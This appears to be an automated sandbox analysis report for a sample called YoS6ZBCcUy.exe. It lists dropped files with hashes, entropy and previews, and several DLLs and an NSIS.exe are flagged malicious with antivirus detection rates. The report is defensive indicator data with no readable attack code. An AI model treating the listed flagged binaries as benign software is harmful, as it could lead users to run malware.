                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgjbhyqa.ui5.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se0cozrl.lan.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sttx5jb4.uya.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wb502h3l.yas.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdglzjap.z2l.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpcr2ypo.jes.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykfywenf.2nk.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoyshlnq.1n1.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):262144
                                                                                                                                                                                            Entropy (8bit):7.040362388355635
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:1YY/D4hH334/EDRom7sMD+ztiU6YW9+cYjb0w7C+TS4idLekmS:1YYkhYeRoHt8U6xwcmb0wr1S
                                                                                                                                                                                            MD5:B9C1E07B4B2EDA5D3650ACAD008B8374
                                                                                                                                                                                            SHA1:5F193013D0F9CAA41E1A1B2441E5E969315803C7
                                                                                                                                                                                            SHA-256:A94785C2269DA10BC56B8B2D526E6028B22D62D0961DB3129ABC0208416C119E
                                                                                                                                                                                            SHA-512:67EFFA650CEB69AFBE040385F017F22BA270AB04AB7CF9AB5B2A64F4D0ECB6D6F29809BD49EE9C9F0AD42D9BFBAB595F213FB276259D62F8C48D97431AFD0708
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....IEg...........!.....z..........!........................................`............@.........................@...R.......(....0.......................@..@...x............................... ...................$............................text....x.......z.................. ..`.rdata...`.......b...~..............@..@.data...H...........................@....00cfg....... ......................@..@.rsrc........0......................@..@.reloc..@....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):226816
                                                                                                                                                                                            Entropy (8bit):6.641421803992435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:6BrX/YVAjaKHMVJcjt4FyZTYTC1leMllGbmPVMpJv:6B7XmFJQtHZTkojllGbmPVMj
                                                                                                                                                                                            MD5:66DE65D980D40F3AAAC3DA64BE631A91
                                                                                                                                                                                            SHA1:E9DB45421829AADF312EE888F5340ADE4545AF89
                                                                                                                                                                                            SHA-256:1CB9FCC2D76F51DBD08D58209C3E732B1ABD0C1C0A3760D95374C68C890FF010
                                                                                                                                                                                            SHA-512:FA8BC38B7C5D663497C1798A292D75F768D528CFE272F23C1CC3A4CDAE80229772832BD45B54D2CE1815D347C941371EB87B84DCC794EAAE515109F5B71F2FB4
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...+IEg.........." ......................................................................`.........................................P+..R....0..(............p..................H...p*.............................. ...@............3..H............................text...X........................... ..`.rdata..............................@..@.data...p....P.......8..............@....pdata.......p.......D..............@..@.00cfg..8............V..............@..@.gxfg...p............X..............@..@.retplne.............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\c2356ad7-ebfb-4a7f-b728-ee8c5b52948f.tmp.bin

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):478262
                                                                                                                                                                                            Entropy (8bit):6.641750483832833
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:smYR2v42TPWRk/LBFn6FnelvxRXYQ9WgRuFoj4BEanaMT:u2l6R4V6p49RuFojf6aS
                                                                                                                                                                                            MD5:71EE48D05DCAAF3EDC86C7A8DDC7CFD8
                                                                                                                                                                                            SHA1:9448DAE20207994597047D2796F3E237CA76B287
                                                                                                                                                                                            SHA-256:4776212795CA4946FA4AAD57DF8EE4FB4A4D966CF23FBA6A47AC18B3D8B73B52
                                                                                                                                                                                            SHA-512:814B4456A04D07662888BF35D5F6D40B2CC5938D9EBF77F597D113EF2CAD62C6BAAE9ED9C36765F8DA4FB37A848443A29632F090AD42DAA50AD44EA766A138C1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:B.....'*.....B...)n.i...U/q..#l.d'.. ............. ......z...j..x)j..zA..z...j..x)B..zA.......u.........i..j.i.#O)F.........!.#.V!.V!.#.Rm.V....!.R!.#.V!.V/U.)...'.!.j...'...)...R'...#RB.UUU/j.!....|..j.#F.i#Z..#F.i.#O+Fz....!..!.)..'.#.R..j.#F.i)......_...!..r)..#.V..N...A.!.V!..t ..q."r#X''.UUU'...2..#. .)k..j.[.j.q..*....S.c'..UUU.#&.UUUBPTUU/j.!./q.!..!..Uz#i/q....!.V)....!.!.V!.#.m....!.l.m!./j.....!.!...U{A.!..!.'.!....Ux/j..^...)l.#.!.)m./j.b!.V!..)j.)..#.V./.UUU!.R#r..#.V......).&..........!."....t)....<...!.)E.{E'..m.R..../U..'.....#b.U......kC...c.r./c..)S..!.VkC...A.)S...!.V..A.)S..!.V..A.)S.....!.V'&..*..!..kC...)h.!.R.)h.#.R.R.%..).../.UUU........#F.i...j.#F.i.#O)F.!.'..#.R!....#r/c.!..t: ..".../c._!.R!.c'......m.V........!.!.V!...s/\. ..".../\._+......!.R!.V...'.^.!....!..U{/j.!.R!.V....)m.#.V.b.........#F.i..j.#F.i.#O)F./\.!./c.!.!...#.B/x..j#F.i..!..!.!....].Z#.Z!.Z#.F#b.XkB.#.^

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\fe8b9789-d2f6-4aad-bbf7-48cd502d9928.tmp.bin

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):478262
                                                                                                                                                                                            Entropy (8bit):6.641750483832833
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:smYR2v42TPWRk/LBFn6FnelvxRXYQ9WgRuFoj4BEanaMT:u2l6R4V6p49RuFojf6aS
                                                                                                                                                                                            MD5:71EE48D05DCAAF3EDC86C7A8DDC7CFD8
                                                                                                                                                                                            SHA1:9448DAE20207994597047D2796F3E237CA76B287
                                                                                                                                                                                            SHA-256:4776212795CA4946FA4AAD57DF8EE4FB4A4D966CF23FBA6A47AC18B3D8B73B52
                                                                                                                                                                                            SHA-512:814B4456A04D07662888BF35D5F6D40B2CC5938D9EBF77F597D113EF2CAD62C6BAAE9ED9C36765F8DA4FB37A848443A29632F090AD42DAA50AD44EA766A138C1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:B.....'*.....B...)n.i...U/q..#l.d'.. ............. ......z...j..x)j..zA..z...j..x)B..zA.......u.........i..j.i.#O)F.........!.#.V!.V!.#.Rm.V....!.R!.#.V!.V/U.)...'.!.j...'...)...R'...#RB.UUU/j.!....|..j.#F.i#Z..#F.i.#O+Fz....!..!.)..'.#.R..j.#F.i)......_...!..r)..#.V..N...A.!.V!..t ..q."r#X''.UUU'...2..#. .)k..j.[.j.q..*....S.c'..UUU.#&.UUUBPTUU/j.!./q.!..!..Uz#i/q....!.V)....!.!.V!.#.m....!.l.m!./j.....!.!...U{A.!..!.'.!....Ux/j..^...)l.#.!.)m./j.b!.V!..)j.)..#.V./.UUU!.R#r..#.V......).&..........!."....t)....<...!.)E.{E'..m.R..../U..'.....#b.U......kC...c.r./c..)S..!.VkC...A.)S...!.V..A.)S..!.V..A.)S.....!.V'&..*..!..kC...)h.!.R.)h.#.R.R.%..).../.UUU........#F.i...j.#F.i.#O)F.!.'..#.R!....#r/c.!..t: ..".../c._!.R!.c'......m.V........!.!.V!...s/\. ..".../\._+......!.R!.V...'.^.!....!..U{/j.!.R!.V....)m.#.V.b.........#F.i..j.#F.i.#O)F./\.!./c.!.!...#.B/x..j#F.i..!..!.!....].Z#.Z!.Z#.F#b.XkB.#.^

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\LICENSE.electron.txt

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1096
                                                                                                                                                                                            Entropy (8bit):5.13006727705212
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                            MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                            SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                            SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                            SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\LICENSES.chromium.html

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9099045
                                                                                                                                                                                            Entropy (8bit):4.754770173605162
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:2o9dQ06p6j6j1WOwRiXjYmfy6k6mjK64jK6gjK6e6cjK6feGjl8PpE:BFOeGT
                                                                                                                                                                                            MD5:6FF57C0AECCDF44C39C95DEE9ECEA805
                                                                                                                                                                                            SHA1:C76669A1354067A1C3DDBC032E66C323286A8D43
                                                                                                                                                                                            SHA-256:0BA4C7B781E9F149195A23D3BE0F704945F858A581871A9FEDD353F12CE839CA
                                                                                                                                                                                            SHA-512:D6108E1D1D52AA3199FF051C7B951025DBF51C5CB18E8920304116DCEF567367ED682245900FDA3AD354C5D50AA5A3C4E6872570A839A3A55D3A9B7579BDFA24
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<label class="show show-all" tabindex="0">.<input type="checkbox" hidden>.</label>.<div class="open-sourced">. Chromium software is made available as source code. <a href="https://source.chromium.org/chromium">here</a>..</div>..<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<labe

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\NSIS.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):188826112
                                                                                                                                                                                            Entropy (8bit):6.758169658073029
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1572864:1wl41lgY+w9QLv1JWYc6UeOtUUGQUT1jdu4BPPuuwT2GOqiB1sr7zjg7ob753oUV:rF4oD0QdG09P
                                                                                                                                                                                            MD5:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            SHA1:1D32E6F1C6BA770C3B2625D0241BE0F2D4581B5D
                                                                                                                                                                                            SHA-256:A674229C90366A8300AD63C8AE675C2BC1C12307BCCB00AE818DFA67C1955BF5
                                                                                                                                                                                            SHA-512:40966C176EAF9E025597599CB99532B3C36C3E72BCF991B95A450EB26F663B61A79933D741CCE807E18C198239E3C49973189E9EB2CDBAF4B29115A6C25FF09A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......FH.........`IY........@.............................P............`..........................................d..k...0...h....`m.......#...H...........q..5..P.......................0...(....}H.@............................................text...*DH......FH................. ..`.rdata.......`H......LH.............@..@.data....H......L..................@....pdata....H...#...H.................@..@.gxfg....B...pl..D....-.............@..@.retplne......l......*...................rodata.......l......,.............. ..`.tls..........l......>..............@...CPADinfo8.....m......D..............@...LZMADEC.......m......F.............. ..`_RDATA.......0m......X..............@..@malloc_h.....@m......Z.............. ..`prot.........Pm......\..............@..@.rsrc........`m......^..............@..@.reloc...5....q..6....2.............@..B................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\chrome_100_percent.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):151599
                                                                                                                                                                                            Entropy (8bit):7.915992368779121
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:ez8JCGIdTwTPagr8o9RHi/T9P1L2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:ez81IdT8agr8EC/T95K18Gb0OV8ld0Gq
                                                                                                                                                                                            MD5:83EC43F2AF9FC52025F3F807B185D424
                                                                                                                                                                                            SHA1:EA432F7571D89DD43A76D260CB5853CADA253AA0
                                                                                                                                                                                            SHA-256:A659EE9EB38636F85F5336587C578FB29740D3EFFAFF9B92852C8A210E92978C
                                                                                                                                                                                            SHA-512:6DDCA85215BF6F7F9B17C5D52BD7395702515BC2354A8CD8FA6C1CCD7355A23B17828853CEABEEF597B5BCA11750DC7C9F6EC3C45A33C2106F816FEC74963D86
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..........<.............h.....i.\...j.....k.I...l.....n.....o.....p.:...q.4...r.o...s.?...t..!..u..%..v.@'..w..1..x..<..y.l?..z..C..{..G..|..I..}..J..~..M.....O.....R....|V.....Z.....]....N`.....a....3c....gd.....e....@g.....g.....m....~s....Fw....&{.....~..........*.....m................8..........._...........1....V.............w....e........F.........'....Z....k....5...,.....-.h........./.....0.!...1.....6.f...7.....8..!....$....&...../.....1.....5....3:....CE.....F....(O.....U....b[.....`....g....^i.....m.....q....V{....v~..............R...............X.....#.................................................|.....S..........W...........i..........2.....`...........S...........S.....(............................s...........y.....N.....".......................&.............................................Q"....-#.....#....$....v%....?&.....&....*(.... ).....*...........2....33....3.....3.....4....5....v6.....6.....7....f7....7.....7.....>.....A....sB

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\chrome_200_percent.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):228644
                                                                                                                                                                                            Entropy (8bit):7.946488830213853
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:coDQYajN6svyA6nI86ur8EC/T9ugx5GMRejnbdZnVE6YoppO4:cVfjN6svyA6D4B79a6edhVELoXO4
                                                                                                                                                                                            MD5:DC48A33BD20BFC7CACFC925A84B015B6
                                                                                                                                                                                            SHA1:8DFEE88FD1DC77F89AD88C19146FE3AB45E43F3C
                                                                                                                                                                                            SHA-256:2C1B3E4B8A0CF837AE0A390FCA54F45D7D22418E040F1DFEA979622383ACCED6
                                                                                                                                                                                            SHA-512:1D54EB5D2BA06AF0BA8F6B491B0D43F178A48AC82CDF383BEB265E732DDFC06BCA9692003FDFCE56F7F00AF97F29ACF046C73B891B8C561610098F9626EAF05A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..........<.........&...h.....i.....j.....k.....l.....n.....o.|%..p..*..q..-..r.85..s..:..t..>..u.CG..v..K..w.._..x._t..y.{y..z....{.4...|....}.m...~...............................................h.............................5.................t...........-.................D............$.....-....K9.....@....FH...bL...9O...nT...)U...jV...UZ....]...s`...xc...f....j...n..,.\r..-..s....ku../..v..0..w..1.Dx..6..x..7.....8.Q............................F................S..........{...........^.....@...........!....%....&/....R2....:....>....RH....R.....V....|X....Sa.....i....k.....n.....r.....y.....{....%..........`.....7...........................................0.....I..........;.....l.....b.....B.....%.....S.....m..........L...........R..........V...........g.....)........................!.....'....-....u3.....4.....5.....6.....8....:9.....:.....<....=....`?....$L.....\....v\.....\....;].....]....._....._....K`....`.....a....]a....a.....g.....k....Rl

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\d3dcompiler_47.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4916728
                                                                                                                                                                                            Entropy (8bit):6.398031738914566
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:hCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRN1:oG2QCwmHjnog/pzHAo/Ayc
                                                                                                                                                                                            MD5:A7B7470C347F84365FFE1B2072B4F95C
                                                                                                                                                                                            SHA1:57A96F6FB326BA65B7F7016242132B3F9464C7A3
                                                                                                                                                                                            SHA-256:AF7B99BE1B8770C0E4D18E43B04E81D11BDEB667FA6B07ADE7A88F4C5676BF9A
                                                                                                                                                                                            SHA-512:83391A219631F750499FD9642D59EC80FB377C378997B302D10762E83325551BB97C1086B181FFF0521B1CA933E518EAB71A44A3578A23691F215EBB1DCE463D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
